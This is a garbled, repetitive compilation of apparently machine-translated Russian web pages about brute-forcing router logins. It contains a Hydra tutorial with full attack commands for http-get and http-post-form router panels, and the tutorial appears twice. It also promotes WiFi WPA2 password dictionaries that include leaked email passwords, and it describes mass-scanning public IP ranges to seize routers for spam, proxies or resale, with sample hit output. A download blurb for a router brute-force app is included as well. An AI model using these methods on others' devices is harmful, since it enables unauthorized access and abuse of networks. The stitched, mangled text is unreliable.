*There could be a warning here that you should not use this program for criminal purposes, but hydra writes this before each hacking session*
In general, I decided to delve into the settings of the router according to my needs. I typed in an address that was familiar to everyone, and then they asked for the password. What should I do? Well, I started going through passwords, but their number was too large to go through everything and too small to do a reset.
And I opened google. After a couple of inquiries, I learned about such a thing as hydra. And then it began: the thirst for discovery, the search for the unknown, and so on.
Let's get started
The first thing I did was compile a dictionary of passwords, no more, no less, as many as 25 combinations. Next, download either Kali linux or Hydra itself (if you are a penguin and you have Linux). Now we have two options (well, like two, I found information on two options).Or you have a dialog box like this:
Or a form on the website asks for a login and password. My first option, so let's start with that. On our way to the “admin panel” there is a guard in the form of a dialog box. This is a type of authorization http-get.
Open the terminal. Enter:
Hydra -l admin -P myPass.txt -s 80 192.168.1.1 http-get /
Where after “-l” comes the login, after “-P” the dictionary, after “-s” the port. We also have other flags at our disposal:
-R restore previous interrupted/aborted sessionS perform SSL connection
S PORT if the service is not on the default port, you can set the port here
L LOGIN or -L FILE with LOGINS (names), or load several logins from FILE
P PASSWORD or -P FILE with passwords for brute force, or load several passwords from FILE
X MINIMUM: MAXIMUM: CHARACTER_SET generating passwords for brute force, type "-x -h" for help
E nsr “n” - try with an empty password, “s” - login as password and/or “r” - reverse credentials
U focus on the user, not the passwords (effective! implied by using the -x option)
C FILE format where “login: password” are separated by colons, instead of the -L/-P option
M FILE list of servers to attack, one entry per line, after the colon ":" you can specify the port
O FILE write found login/password pairs to FILE instead of standard output
F / -F exit when the login/password pair is matched (-M: -f for host, -F globally)
T TASKS number of TASKS running in parallel (per host, default: 16)
W / -W TIME time to wait for responses (32 seconds) / between connections per thread
-4 / -6 prefer IPv4 (default) or IPv6 addressesV / -V / -d verbal mode / show login+password for each attempt / debugging mode
Q do not print connection error messages
U detailed information about using the module
server target: DNS, IP or 192.168.0.0/24 (this OR -M option)
service service for hacking (see list of supported protocols)
OPT some service modules support additional input (-U for module help)
Well, something like this:
Second option:
Not mine, honestly taken from Anti-Chat, with the author’s grammatical errors corrected (I left an abundance of punctuation marks). I wonder if this can be considered a translation?
We are greeted with a form on the website:
This authorization method is http-post-form, and here we need to tinker a little, since we need to understand how the browser sends data to the router.
In this case, I used the Chrome browser (its analogue Chromium in Kali Linux, installed via apt-get install chromium).
Now you need to do one very stupid thing... specify the wrong login and pass...
We'll see why later...
Press F12 to go to web page editing mode.
Go to Network → Check the box Preserv log.
We enter a false login and password...
So what's up? This will not work! Moreover, after several unsuccessful login attempts, the form is blocked for 180 seconds.
Go to the tab HEADERS looking for the line:
Request URL:http://192.168.0.1/index.cgi
We cut everything down to the IP address - /index.cgi... Congratulations, we have found the first part of the authorization script... Let's move on... Go to the tab FORM DATA and change the display mode to VIEV SOURCE.
Update_login=login&update_password=password&check_auth=y&tokenget=1300& update_login=login&update_password=password
Bingo! We found the second part of the authorization script! A little bit more! Now you need to find the page with the error message... You need to click on the ELEMENTS tab.
And select the HTML code element (CTRL+SHIFT+C) and select the window with the error message... in this case - Authentication failed!
Authentication failed!
Choose:
Span langkey="bad_auth"
and edit a little... bad_auth - that's it! The key is practically in our pocket... Now we can write the entire authorization string:
Index.cgi:update_login=login&update_password=password:bad_auth
Now you need to substitute ^USER^ instead of “login” and ^PASS^ instead of “password” and then the line will look like:
Index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth
Enter the command:
Hydra -l admin -P router-pass.dic -t 1 -e nsr -vV -f -s 80 192.168.0.1 http-post-form "/index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth "
Please note that there is a colon between parts of the script! it is necessary! By the way, there was no blocking of the form through the hydra... This is very pleasing.
I can’t be sure that the second method works, since I don’t have the appropriate router model. You'll have to trust the expressive person from Antichat.
If anyone is interested, please check and write in the comments. I worked with the TL-WR1043N/TL-WR1043ND router. Router from Antichat - D-link300NRU.
Thank you for your attention!
Dictionaries for brute wifi are often used by professional hackers in their activities. Of course, you will also need specialized software, which is necessary for synchronization with the dictionary database.
But if the programs themselves can be easily downloaded from any open source, then you will have to look hard for good dictionaries for Brutus. Moreover, this is a rare and very valuable find on the Internet.
But if everything is clear to a professional without further ado, then for a less experienced audience all this terminology is a wonder. The average user cannot understand why and for what purpose a brute force wifi wpa2 may be required. How to use it and what does all this “have” with?
What is Brutus
Brutus is one of the systems for cracking a password by selecting a key combination. Your computer will be able to guess the password if you have the appropriate software and a dictionary database.Brute can be used almost anywhere where the system is protected with a password. This could be a mailbox, a social page or something else.
We will talk in more depth about brute access to a wifi router. Our goal is to gain access to a third-party Internet connection. And this is where dictionaries, software and patience are required.
Where does Brute Wifi begin?
Initially, it is worth distinguishing between the available router encryption systems - WPA and WPA2. In both cases, you can work with password generation, but it is the latter option for encrypting the system that is less desirable.The dictionary for Brute wifi wpa2 connects to software that automatically generates and searches for matches. This procedure is lengthy and can take at least several days. But again, this only depends on the complexity of the password itself.
But if you managed to download dictionaries from a reliable and proven database, then you can count on a positive final result.
Are all dictionaries the same?
Brushing wifi access should only be started if you clearly understand all the sequential steps and stages that you will have to overcome. The fact is that even brute wifi dictionaries are very different from each other and their use may not always be effective if you select the wrong database.Also take into account the maximum number sequence in the dictionary you downloaded. Most often, users use 8 digits in the password, but there are dictionaries with a base of password combinations of 7-9 digits.
The wifi password dictionary should be adapted to your region. That is, there are separate databases in English, Spanish, French and other languages. In our case, we need a database of Russian password combinations.
Before synchronizing dictionaries, take the time to view them in a text editor and make sure that they are compiled at the proper level and cover the majority of popular combinations.
Hacking access to wifi from the phone screen
It is quite possible to perform wifi brute force from an Android smartphone, since the corresponding software is available for free and can be downloaded without restrictions. And then after installation, you will need to use the same dictionaries, where you will probably select a unique password combination.The best dictionaries on the web
We have collected the best dictionary databases for subsequent password selection and wifi brute force. It’s easy to verify this - download our dictionaries to your computer and try them.The presented dictionaries have one of the largest databases of combinations of password options for Russian queries. And the dictionaries themselves are constantly being improved and supplemented, which is important for new users.
Download dictionaries for Brute WiFi (wpa, wpa2)
- :
- :
- [Dates in various spellings]:
- [Small dictionary of 9 million words]:
- [Passwords of emails leaked in 2014]:
Unlike full-fledged servers, where PAM (Pluggable Authentication Modules) are usually configured, which will limit access to the server for a time specified in the config after several (usually three to five) unsuccessful login attempts, the Linux router is cut off. There is no PAM on it, so nothing prevents it from being brute-forced. And this idea - brute force and seizure of routers - is, one might say, in trend today!
Our goal is your router
Why do you need to seize the router? It depends on the hacker’s imagination: you can use it to send spam, or turn it into a private sox (proxy). Or you can sell the access you receive - this pleasure costs, according to one of my friends, up to $200 a month, and this product is quite popular.
Scanning routers
To gain access, hackers use a simple but effective program Tunnel Scanner. The Type parameter specifies the scanning type: by static login, by static password, by list of logins/passwords. The third option (By Login;Password List) is usually the most effective.
The Static parameter allows you to specify the range of IP addresses that will be scanned. If you enable the IP ranges from file checkbox, the range of IP addresses will be taken from the file specified in the IP ranges field (by default, this is a file named ip.txt). The ranges in it are indicated as shown in the screenshot below.
The list of logins and passwords is specified by the Login;Password parameter. By default it is taken from the words.txt file. Of course, the example list below is quite poor, but I think you can easily find a more advanced one on the Internet (or you can be smart and create your own).
The Threads parameter sets the number of simultaneous threads for the brute. The default value is 900 - this is more than enough. The Timeout parameter specifies the timeout in seconds between attempts.
Well, all that remains is to press the Start button.
As you can see, we have already received the first results. Let's analyze them:
37.112.128.160 - failed to connect 37.112.128.164 - checking admin;admin 37.112.128.163 - failed to connect 37.112.128.162 - failed to connect 37.112.128.165 - failed to connect 37.112.128.161 - failed to connect 37.11 2.128.164 - [-] : admin;admin 37.112.128.164 - checking support;support 37.112.128.164 - [-]: support;support 37.112.128.164 - checking root;123456 37.112.128.164 - [-]: root;123456 37.112.128.164 - checking ubnt ;ubnt 37.112.128.164 - [-]: ubnt;ubnt 37.112.128.164 - checking ftp;123456 37.112.128.164 - [+]: ftp;123456 …
The number in square brackets is the thread number (it doesn't matter to us). Next, indicate the IP address to be scanned. The line failed to connect means that the SSH port is closed - either completely, or for us (by the firewall). A line like [-]: admin;admin reports that the SSH port is open, but the password and/or login did not match. But a similar line with + says that everything was successful:
Continuation is available only to members
Option 1. Join the “site” community to read all materials on the site
Membership in the community within the specified period will give you access to ALL Hacker materials, increase your personal cumulative discount and allow you to accumulate a professional Xakep Score rating!
Editor overview
We provide Router Brute Force ADS 2 APK file for Android 2.0 or higher or Blackberry (BB10 OS) or Kindle Fire and many Android Phones such as Samsung Galaxy, LG, Huawei and Moto. Router Brute Force ADS 2 APK is a free Apps tools.
It"s newest and latest version for Router Brute Force ADS 2 APK is (evz.android.rbf_ads.apk). It"s easy to download and install to your mobile phone (android phone or blackberry phone). Read Router Brute Force ADS 2 APK detail and permission below and click download apk button to go to download page.
On download page, the download will be start automatically. You need to download All-in-One APK Downloader first. we provide direct download link for Router Brute Force ADS 2 APK there. Router Brute Force ADS 2 APK is the property and trademark from the developer
Please be aware that we only share the original and free apk installer for Router Brute Force ADS 2 APK WITHOUT ANY cheat, crack, unlimited gold, gems, patch or any other modifications. if there is any problem please let us know.
in detailThe new version is finally released!
please do not use old versions,
and remove it and use only this version. Simple and effective brute force for page/control admin routers! (Basic authentication -> base64 access) Do you have a free WiFi connection?
but if you want to access the router settings, to open some ports or something else you need a password.
Here's Brute Force Router(RFB) to the rescue!!! It comes with a sample text file that includes 398 passwords for different default routers, but don't forget that you can update it with your details! If you want to enter special ones passwords, you can use comma future...be sure to check the login because it is case sensitive in some routers(Admin/Admin).Use this tool only if you have a strong WiFi signal and should not use dictionary files more than 5 MB, Otherwise it will work very slowly! RBF automatically gets the default gateway and generates the URL, so you don't need to do any preparations (only if you are already connected to WiFi). This is an experimental tool. use it at your own risk! Please rate the tool and leave comments!
if you have problems with it, feel free to email me.* Please read the description carefully and don't leave negative feedback due to low WiFi signal or large dictionary files! *!!! THIS IS AN EXPERIMENTAL APPLICATION!!!
But!!! NOT CURRENTLY WORKING ON ALL ROUTERS!!!
But!!! SO IF YOU WANT TO HELP, PLEASE LEAVE FEEDBACK WITH YOUR ROUTER MODEL AND MANUFACTURER!!! What's new?
What's new in this version: - better and faster algorithm
- this is a big bug fix
- And the interface has been slightly changed, so
- new *check* buttons for checking the URL for Vulnerability. - Russian language added
*There could be a warning here that you should not use this program for criminal purposes, but hydra writes this before each hacking session*
In general, I decided to delve into the settings of the router according to my needs. I typed in an address that was familiar to everyone, and then they asked for the password. What should I do? Well, I started going through passwords, but their number was too large to go through everything and too small to do a reset.
And I opened google. After a couple of inquiries, I learned about such a thing as hydra. And then it began: the thirst for discovery, the search for the unknown, and so on.
Let's get started
The first thing I did was compile a dictionary of passwords, no more, no less, as many as 25 combinations. Next, download either Kali linux or Hydra itself (if you are a penguin and you have Linux). Now we have two options (well, like two, I found information on two options).Or you have a dialog box like this:
Or a form on the website asks for a login and password. My first option, so let's start with that. On our way to the “admin panel” there is a guard in the form of a dialog box. This is a type of authorization http-get.
Open the terminal. Enter:
Hydra -l admin -P myPass.txt -s 80 192.168.1.1 http-get /
Where after “-l” comes the login, after “-P” the dictionary, after “-s” the port. We also have other flags at our disposal:
-R restore previous interrupted/aborted sessionS perform SSL connection
S PORT if the service is not on the default port, you can set the port here
L LOGIN or -L FILE with LOGINS (names), or load several logins from FILE
P PASSWORD or -P FILE with passwords for brute force, or load several passwords from FILE
X MINIMUM: MAXIMUM: CHARACTER_SET generating passwords for brute force, type "-x -h" for help
E nsr “n” - try with an empty password, “s” - login as password and/or “r” - reverse credentials
U focus on the user, not the passwords (effective! implied by using the -x option)
C FILE format where “login: password” are separated by colons, instead of the -L/-P option
M FILE list of servers to attack, one entry per line, after the colon ":" you can specify the port
O FILE write found login/password pairs to FILE instead of standard output
F / -F exit when the login/password pair is matched (-M: -f for host, -F globally)
T TASKS number of TASKS running in parallel (per host, default: 16)
W / -W TIME time to wait for responses (32 seconds) / between connections per thread
-4 / -6 prefer IPv4 (default) or IPv6 addressesV / -V / -d verbal mode / show login+password for each attempt / debugging mode
Q do not print connection error messages
U detailed information about using the module
server target: DNS, IP or 192.168.0.0/24 (this OR -M option)
service service for hacking (see list of supported protocols)
OPT some service modules support additional input (-U for module help)
Well, something like this:
Second option:
Not mine, honestly taken from Anti-Chat, with the author’s grammatical errors corrected (I left an abundance of punctuation marks). I wonder if this can be considered a translation?
We are greeted with a form on the website:
This authorization method is http-post-form, and here we need to tinker a little, since we need to understand how the browser sends data to the router.
In this case, I used the Chrome browser (its analogue Chromium in Kali Linux, installed via apt-get install chromium).
Now you need to do one very stupid thing... specify the wrong login and pass...
We'll see why later...
Press F12 to go to web page editing mode.
Go to Network → Check the box Preserv log.
We enter a false login and password...
So what's up? This will not work! Moreover, after several unsuccessful login attempts, the form is blocked for 180 seconds.
Go to the tab HEADERS looking for the line:
Request URL:http://192.168.0.1/index.cgi
We cut everything down to the IP address - /index.cgi... Congratulations, we have found the first part of the authorization script... Let's move on... Go to the tab FORM DATA and change the display mode to VIEV SOURCE.
Update_login=login&update_password=password&check_auth=y&tokenget=1300& update_login=login&update_password=password
Bingo! We found the second part of the authorization script! A little bit more! Now you need to find the page with the error message... You need to click on the ELEMENTS tab.
And select the HTML code element (CTRL+SHIFT+C) and select the window with the error message... in this case - Authentication failed!
Authentication failed!
Choose:
Span langkey="bad_auth"
and edit a little... bad_auth - that's it! The key is practically in our pocket... Now we can write the entire authorization string:
Index.cgi:update_login=login&update_password=password:bad_auth
Now you need to substitute ^USER^ instead of “login” and ^PASS^ instead of “password” and then the line will look like:
Index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth
Enter the command:
Hydra -l admin -P router-pass.dic -t 1 -e nsr -vV -f -s 80 192.168.0.1 http-post-form "/index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth "
Please note that there is a colon between parts of the script! it is necessary! By the way, there was no blocking of the form through the hydra... This is very pleasing.
I can’t be sure that the second method works, since I don’t have the appropriate router model. You'll have to trust the expressive person from Antichat.
If anyone is interested, please check and write in the comments. I worked with the TL-WR1043N/TL-WR1043ND router. Router from Antichat - D-link300NRU.
Thank you for your attention!